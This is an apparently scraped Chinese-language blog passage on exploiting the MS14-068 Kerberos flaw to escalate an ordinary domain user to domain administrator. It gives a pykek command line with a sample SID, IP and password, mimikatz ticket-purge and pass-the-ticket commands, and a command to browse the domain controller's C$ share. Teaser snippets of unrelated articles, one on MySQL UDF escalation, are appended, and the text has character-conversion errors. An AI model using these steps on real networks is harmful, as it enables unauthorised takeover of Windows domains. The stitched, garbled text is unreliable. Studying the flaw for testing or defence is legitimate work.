使用者向金鑰分發中心(key distribution center即kdc)申請票證授予票證(ticket-granting ticket即tgt)如果此時宣告自己有域管理員許可權,並且金鑰分發中心沒有做校驗,那麼此時金鑰分發中心就會返回一張票據給tgt,tgt會給票據授予伺服器(ticket-granting server即tgs)換發乙個域管理員的服務票據(service ticket)從而觸發漏洞。
換言之就是張三去跟售票員講自己是vip客戶,售票員沒有校驗真實性導致給張三了一張vip的票據。
使用pykek生成
file:
example:ms14-068.py -u @-s -d python ms14-068.py -u [email protected] -s s-1-5-21-3759881954-2993291187-3577547808-1616 -d 192.168.1.12 -p admin123
whoami /user #檢視sid
net time /domain #獲得域使用者名稱即while
使用mimikatz
#kerberos::purge#清除原先伺服器內部的票據資訊
#kerberos::ptc [email protected]
如下所示:
此時可以嘗試列出域控的c盤了。
dir \\機器名\c$
MS14 068域提權漏洞復現
目錄 ms14 068域提權漏洞復現 一 漏洞說明 二 漏洞原理 三 漏洞利用前提 四 實驗環境 五 漏洞利用 總結 改漏洞可能允許攻擊者將未經授權的域使用者賬戶的許可權,提權到域管理員的許可權。微軟官方解釋 kerberos認證原理 服務票據是客戶端直接傳送給伺服器,並請求服務資源的。如果伺服器沒...
MS14 068域許可權提公升漏洞利用
在寫該篇文章之前,本人已經寫過了關於域滲透之 票據和 票據的利用方式,今天的內容也是關於域滲透提權的利用,並且ms14 068這個exp也是由kerberos協議而來。在實際的滲透過程中,獲得了乙個域成員 非管理員 的賬號後,如果剛好域控機器未打補丁 kb3011780 這是官方給出的修復補丁,那麼...
漏洞復現 Mysql UDF提權
udf user defined function 即使用者自定義函式。是通過新增新函式,對mysql的功能進行擴充,其實就像使用本地mysql函式如 user 或 concat 等。那麼我們該如何使用udf檔案呢?在mysql預設安裝的裡面是不存在這個檔案的。那麼如果假設該檔案存在被攻擊者上傳到路...